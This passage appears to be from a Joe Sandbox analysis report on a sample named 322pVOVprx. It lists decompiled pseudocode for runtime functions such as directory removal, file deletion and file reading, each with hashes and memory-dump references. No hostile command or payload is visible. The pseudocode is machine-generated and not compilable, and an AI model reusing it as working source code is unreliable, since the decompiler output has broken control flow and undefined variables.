                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DE08662F0830287FF146FF9586533912615F94F41B045034CD0DCA251DF3D6C45875E
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC66EC() {
                                                                                                                                                                                                                                                        				int _t1;
                                                                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t1 = RemoveDirectoryW(); // executed
                                                                                                                                                                                                                                                        				if (_t1 != 0) goto 0xe5ac670c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC43B8(GetLastError(), _t9, _t10);
                                                                                                                                                                                                                                                        				goto 0xe5ac670e;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                                                        0x7ff6e5ac66f0
                                                                                                                                                                                                                                                        0x7ff6e5ac66f8
                                                                                                                                                                                                                                                        0x7ff6e5ac6702
                                                                                                                                                                                                                                                        0x7ff6e5ac670a
                                                                                                                                                                                                                                                        0x7ff6e5ac6712

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 377330604-0
                                                                                                                                                                                                                                                        • Opcode ID: 45670ffc5494559b4402bb32e1ee61b2bed3bec50e0362f78a5b89dc8e7724e5
                                                                                                                                                                                                                                                        • Instruction ID: 541d09247fe36632b396fa5c7ff12129e444babb212cc0430d701831e9797adf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45670ffc5494559b4402bb32e1ee61b2bed3bec50e0362f78a5b89dc8e7724e5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3D0C922F1860281EB143B7D086533812902F44F25F504A34C81ACA2E1DF2EA955461B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC6F70() {
                                                                                                                                                                                                                                                        				int _t1;
                                                                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t1 = DeleteFileW(); // executed
                                                                                                                                                                                                                                                        				if (_t1 != 0) goto 0xe5ac6f90;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC43B8(GetLastError(), _t9, _t10);
                                                                                                                                                                                                                                                        				goto 0xe5ac6f92;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                                                        0x7ff6e5ac6f74
                                                                                                                                                                                                                                                        0x7ff6e5ac6f7c
                                                                                                                                                                                                                                                        0x7ff6e5ac6f86
                                                                                                                                                                                                                                                        0x7ff6e5ac6f8e
                                                                                                                                                                                                                                                        0x7ff6e5ac6f96

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2018770650-0
                                                                                                                                                                                                                                                        • Opcode ID: 677f2ceb8ee0d5d75214142403d5559098fe9c7e5a50d88e5e1a5187c850d191
                                                                                                                                                                                                                                                        • Instruction ID: ca37edf428f3568237046e04e1a5f5ffa2b3c37c2e463545ad1b76c778f4259c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 677f2ceb8ee0d5d75214142403d5559098fe9c7e5a50d88e5e1a5187c850d191
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15D0C926F2850285E7147B7D086533812902F44F65F500634C82AC62E0EF2EA985460B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2772937645-0
                                                                                                                                                                                                                                                        • Opcode ID: 2eb70a2f0075b5df4e32ad510079c3b3b3dc7bfa02a9b4199a1254bfbddd7d17
                                                                                                                                                                                                                                                        • Instruction ID: fb3207f38aede513287861b87ba0640b180d9ccde97df7a0a52954c9c4d27ae2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eb70a2f0075b5df4e32ad510079c3b3b3dc7bfa02a9b4199a1254bfbddd7d17
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F71BA53E18AC581EA10DB2CC5153FD6360FBA8B48F54E321CB9C93696EF29E6D9C344
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACB37C(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                                                                                        				_a24 = __rdi;
                                                                                                                                                                                                                                                        				if (__rcx != 0) goto 0xe5acb3c4;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				return __edi | 0xffffffff;
                                                                                                                                                                                                                                                        			}



                                                                                                                                                                                                                                                        0x7ff6e5acb37c
                                                                                                                                                                                                                                                        0x7ff6e5acb381
                                                                                                                                                                                                                                                        0x7ff6e5acb386
                                                                                                                                                                                                                                                        0x7ff6e5acb397
                                                                                                                                                                                                                                                        0x7ff6e5acb399
                                                                                                                                                                                                                                                        0x7ff6e5acb39e
                                                                                                                                                                                                                                                        0x7ff6e5acb3a4
                                                                                                                                                                                                                                                        0x7ff6e5acb3c3

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                                                                                                                                                                                                                        • Instruction ID: 151251e13f0b7cf12b9089c775629fed507322a972d6e39079e6a1c0ad5e66b2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E41AD33A1824587EB749A5DA56137973A0EF95F40B600235DB8ECB6D1CF2FE802C75A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB7200(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, void* __r8) {
                                                                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                                                                        				long long _t33;
                                                                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                                                                        				long long _t52;
                                                                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                                                                        				long long _t58;
                                                                                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t52 = __rdi;
                                                                                                                                                                                                                                                        				_t33 = __rbx;
                                                                                                                                                                                                                                                        				_t31 = __rax;
                                                                                                                                                                                                                                                        				_t67 = __rcx;
                                                                                                                                                                                                                                                        				_t57 = __r8;
                                                                                                                                                                                                                                                        				_t71 = __rdx;
                                                                                                                                                                                                                                                        				r13d = 0; // executed
                                                                                                                                                                                                                                                        				0xe5ac40b0(); // executed
                                                                                                                                                                                                                                                        				_t72 = __rax;
                                                                                                                                                                                                                                                        				if (__rax == 0) goto 0xe5ab7313;
                                                                                                                                                                                                                                                        				_t1 = _t68 + 2; // 0x2
                                                                                                                                                                                                                                                        				r8d = _t1;
                                                                                                                                                                                                                                                        				_t12 = E00007FF67FF6E5ABF934(__rax, __rbx, __rcx, __rdi); // executed
                                                                                                                                                                                                                                                        				if (_t12 < 0) goto 0xe5ab7313;
                                                                                                                                                                                                                                                        				 *((long long*)(_t62 + 0x50)) = _t33;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC7938(__rax, _t33, _t67, _t52); // executed
                                                                                                                                                                                                                                                        				_t34 = _t31;
                                                                                                                                                                                                                                                        				if (_t31 - __r8 < 0) goto 0xe5ab730e;
                                                                                                                                                                                                                                                        				 *((long long*)(_t62 + 0x58)) = _t58;
                                                                                                                                                                                                                                                        				 *((long long*)(_t62 + 0x60)) = _t52;
                                                                                                                                                                                                                                                        				_t5 = _t34 - 0x2000; // -8192
                                                                                                                                                                                                                                                        				_t60 =  <  ? _t68 : _t5;
                                                                                                                                                                                                                                                        				_t35 = _t31 - _t60;
                                                                                                                                                                                                                                                        				if (_t35 - __r8 < 0) goto 0xe5ab7304;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_t14 = E00007FF67FF6E5ABF934(_t31, _t35, _t67, _t52); // executed
                                                                                                                                                                                                                                                        				if (_t14 < 0) goto 0xe5ab7304;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABF5FC(_t60, _t35, _t67); // executed
                                                                                                                                                                                                                                                        				_t27 = _t31 - _t35;
                                                                                                                                                                                                                                                        				if (_t27 != 0) goto 0xe5ab7304;
                                                                                                                                                                                                                                                        				if (_t27 == 0) goto 0xe5ab72eb;
                                                                                                                                                                                                                                                        				_t6 = _t72 - 1; // -1
                                                                                                                                                                                                                                                        				_t28 = E00007FF67FF6E5ABC7E0(0x2000, _t6 + _t35 - _t57 + 1, _t71, _t57);
                                                                                                                                                                                                                                                        				if (_t28 == 0) goto 0xe5ab72fd;
                                                                                                                                                                                                                                                        				if (_t28 != 0) goto 0xe5ab72d0;
                                                                                                                                                                                                                                                        				if (_t60 != 0) goto 0xe5ab7270;
                                                                                                                                                                                                                                                        				goto 0xe5ab7304;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5AC409C(0x2000, _t72, _t71, _t57);
                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                        0x7ff6e5ab7200
                                                                                                                                                                                                                                                        0x7ff6e5ab7200
                                                                                                                                                                                                                                                        0x7ff6e5ab7200
                                                                                                                                                                                                                                                        0x7ff6e5ab720e
                                                                                                                                                                                                                                                        0x7ff6e5ab7211
                                                                                                                                                                                                                                                        0x7ff6e5ab7219
                                                                                                                                                                                                                                                        0x7ff6e5ab721c
                                                                                                                                                                                                                                                        0x7ff6e5ab721f
                                                                                                                                                                                                                                                        0x7ff6e5ab7224
                                                                                                                                                                                                                                                        0x7ff6e5ab722a
                                                                                                                                                                                                                                                        0x7ff6e5ab7232
                                                                                                                                                                                                                                                        0x7ff6e5ab7232
                                                                                                                                                                                                                                                        0x7ff6e5ab7239
                                                                                                                                                                                                                                                        0x7ff6e5ab7240
                                                                                                                                                                                                                                                        0x7ff6e5ab7249
                                                                                                                                                                                                                                                        0x7ff6e5ab724e
                                                                                                                                                                                                                                                        0x7ff6e5ab7253
                                                                                                                                                                                                                                                        0x7ff6e5ab7259
                                                                                                                                                                                                                                                        0x7ff6e5ab725f
                                                                                                                                                                                                                                                        0x7ff6e5ab7264
                                                                                                                                                                                                                                                        0x7ff6e5ab7277
                                                                                                                                                                                                                                                        0x7ff6e5ab727e
                                                                                                                                                                                                                                                        0x7ff6e5ab7282
                                                                                                                                                                                                                                                        0x7ff6e5ab7288
                                                                                                                                                                                                                                                        0x7ff6e5ab728a
                                                                                                                                                                                                                                                        0x7ff6e5ab7293
                                                                                                                                                                                                                                                        0x7ff6e5ab729a
                                                                                                                                                                                                                                                        0x7ff6e5ab72aa
                                                                                                                                                                                                                                                        0x7ff6e5ab72af
                                                                                                                                                                                                                                                        0x7ff6e5ab72b2
                                                                                                                                                                                                                                                        0x7ff6e5ab72bb
                                                                                                                                                                                                                                                        0x7ff6e5ab72bd
                                                                                                                                                                                                                                                        0x7ff6e5ab72de
                                                                                                                                                                                                                                                        0x7ff6e5ab72e0
                                                                                                                                                                                                                                                        0x7ff6e5ab72e9
                                                                                                                                                                                                                                                        0x7ff6e5ab72f5
                                                                                                                                                                                                                                                        0x7ff6e5ab72fb
                                                                                                                                                                                                                                                        0x7ff6e5ab732b

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        • Opcode ID: d560286fe817b680bb00b440dfc1ab38256c5f347b7b12031732750a6a17aee9
                                                                                                                                                                                                                                                        • Instruction ID: d8d4939072cab0f74e43533baa445a7b3da864d2efc500301f2a767c6e8b6e2d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d560286fe817b680bb00b440dfc1ab38256c5f347b7b12031732750a6a17aee9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D21F823B0829645FE90BA1A64243BA6751BF45FC4F8C0030EE0CCB78ACF7EE901C249
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACAE0C(signed int __ecx, void* __esi, signed int __rbx, void* __rdx, signed int __rsi, signed int __r12, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                                                                        				signed int* _t15;
                                                                                                                                                                                                                                                        				signed int* _t22;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t15 = _t22;
                                                                                                                                                                                                                                                        				_t15[4] = __rbx;
                                                                                                                                                                                                                                                        				_t15[6] = __rsi;
                                                                                                                                                                                                                                                        				_t15[8] = __r12;
                                                                                                                                                                                                                                                        				_t15[2] = __ecx;
                                                                                                                                                                                                                                                        				r14d = r8d;
                                                                                                                                                                                                                                                        				if (__esi != 0xfffffffe) goto 0xe5acae66;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(_t15);
                                                                                                                                                                                                                                                        				 *_t15 =  *_t15 & 0x00000000;
                                                                                                                                                                                                                                                        				_t9 = E00007FF67FF6E5AC4444(_t15);
                                                                                                                                                                                                                                                        				 *_t15 = 9;
                                                                                                                                                                                                                                                        				return _t9 | 0xffffffff;
                                                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                                                        0x7ff6e5acae0c
                                                                                                                                                                                                                                                        0x7ff6e5acae0f
                                                                                                                                                                                                                                                        0x7ff6e5acae13
                                                                                                                                                                                                                                                        0x7ff6e5acae17
                                                                                                                                                                                                                                                        0x7ff6e5acae1b
                                                                                                                                                                                                                                                        0x7ff6e5acae28
                                                                                                                                                                                                                                                        0x7ff6e5acae34
                                                                                                                                                                                                                                                        0x7ff6e5acae36
                                                                                                                                                                                                                                                        0x7ff6e5acae3b
                                                                                                                                                                                                                                                        0x7ff6e5acae3e
                                                                                                                                                                                                                                                        0x7ff6e5acae43
                                                                                                                                                                                                                                                        0x7ff6e5acae65

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                                                                                                                                                                                                                        • Instruction ID: eb40a264b6b798c81dd07de1054a93217e2477482fd57db8b6a905db9235bf0d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93319C23B1865286E711AF5998203782690AF40FA1F510239EA1DCB3D2DF7EAC41876F
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC87B9(void* __ecx, char __edx, intOrPtr* __rax, long long __rbx, long long _a8, char _a16, char _a24, char _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				long long _v24;
                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                        				long long _v40;
                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                                                                        				void* _v56;
                                                                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                                                                        				intOrPtr* _t50;
                                                                                                                                                                                                                                                        				WCHAR* _t53;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC90D8();
                                                                                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                                                                                        				_a24 = r8d;
                                                                                                                                                                                                                                                        				_a16 = __edx;
                                                                                                                                                                                                                                                        				_v40 = 0xfffffffe;
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				if (r8d != 0) goto 0xe5ac882f;
                                                                                                                                                                                                                                                        				GetModuleHandleW(_t53);
                                                                                                                                                                                                                                                        				if (__rax == 0) goto 0xe5ac882f;
                                                                                                                                                                                                                                                        				if ( *__rax != 0x5a4d) goto 0xe5ac882f;
                                                                                                                                                                                                                                                        				_t50 =  *((intOrPtr*)(__rax + 0x3c)) + __rax;
                                                                                                                                                                                                                                                        				if ( *_t50 != 0x4550) goto 0xe5ac882f;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t50 + 0x18)) != 0x20b) goto 0xe5ac882f;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t50 + 0x84)) - 0xe <= 0) goto 0xe5ac882f;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t50 + 0xf8)) == 0) goto 0xe5ac882f;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC88E0(0x20b, __ecx, __rax);
                                                                                                                                                                                                                                                        				_a32 = 0;
                                                                                                                                                                                                                                                        				_v32 =  &_a16;
                                                                                                                                                                                                                                                        				_v24 =  &_a24;
                                                                                                                                                                                                                                                        				_v16 =  &_a32;
                                                                                                                                                                                                                                                        				_v52 = 2;
                                                                                                                                                                                                                                                        				_v48 = 2;
                                                                                                                                                                                                                                                        				_t28 = E00007FF67FF6E5AC86BC(__rbx,  &_v48,  &_v32,  &_v52); // executed
                                                                                                                                                                                                                                                        				if (_a24 == 0) goto 0xe5ac887d;
                                                                                                                                                                                                                                                        				return _t28;
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5ac87b9
                                                                                                                                                                                                                                                        0x7ff6e5ac87bf
                                                                                                                                                                                                                                                        0x7ff6e5ac87c0
                                                                                                                                                                                                                                                        0x7ff6e5ac87c5
                                                                                                                                                                                                                                                        0x7ff6e5ac87d1
                                                                                                                                                                                                                                                        0x7ff6e5ac87d9
                                                                                                                                                                                                                                                        0x7ff6e5ac87e3
                                                                                                                                                                                                                                                        0x7ff6e5ac87e7
                                                                                                                                                                                                                                                        0x7ff6e5ac87f0
                                                                                                                                                                                                                                                        0x7ff6e5ac87fa
                                                                                                                                                                                                                                                        0x7ff6e5ac8800
                                                                                                                                                                                                                                                        0x7ff6e5ac8809
                                                                                                                                                                                                                                                        0x7ff6e5ac8814
                                                                                                                                                                                                                                                        0x7ff6e5ac881d
                                                                                                                                                                                                                                                        0x7ff6e5ac8826
                                                                                                                                                                                                                                                        0x7ff6e5ac882a
                                                                                                                                                                                                                                                        0x7ff6e5ac882f
                                                                                                                                                                                                                                                        0x7ff6e5ac8837
                                                                                                                                                                                                                                                        0x7ff6e5ac883f
                                                                                                                                                                                                                                                        0x7ff6e5ac8847
                                                                                                                                                                                                                                                        0x7ff6e5ac8850
                                                                                                                                                                                                                                                        0x7ff6e5ac8853
                                                                                                                                                                                                                                                        0x7ff6e5ac8866
                                                                                                                                                                                                                                                        0x7ff6e5ac8870
                                                                                                                                                                                                                                                        0x7ff6e5ac887c

                                                                                                                                                                                                                                                        APIs
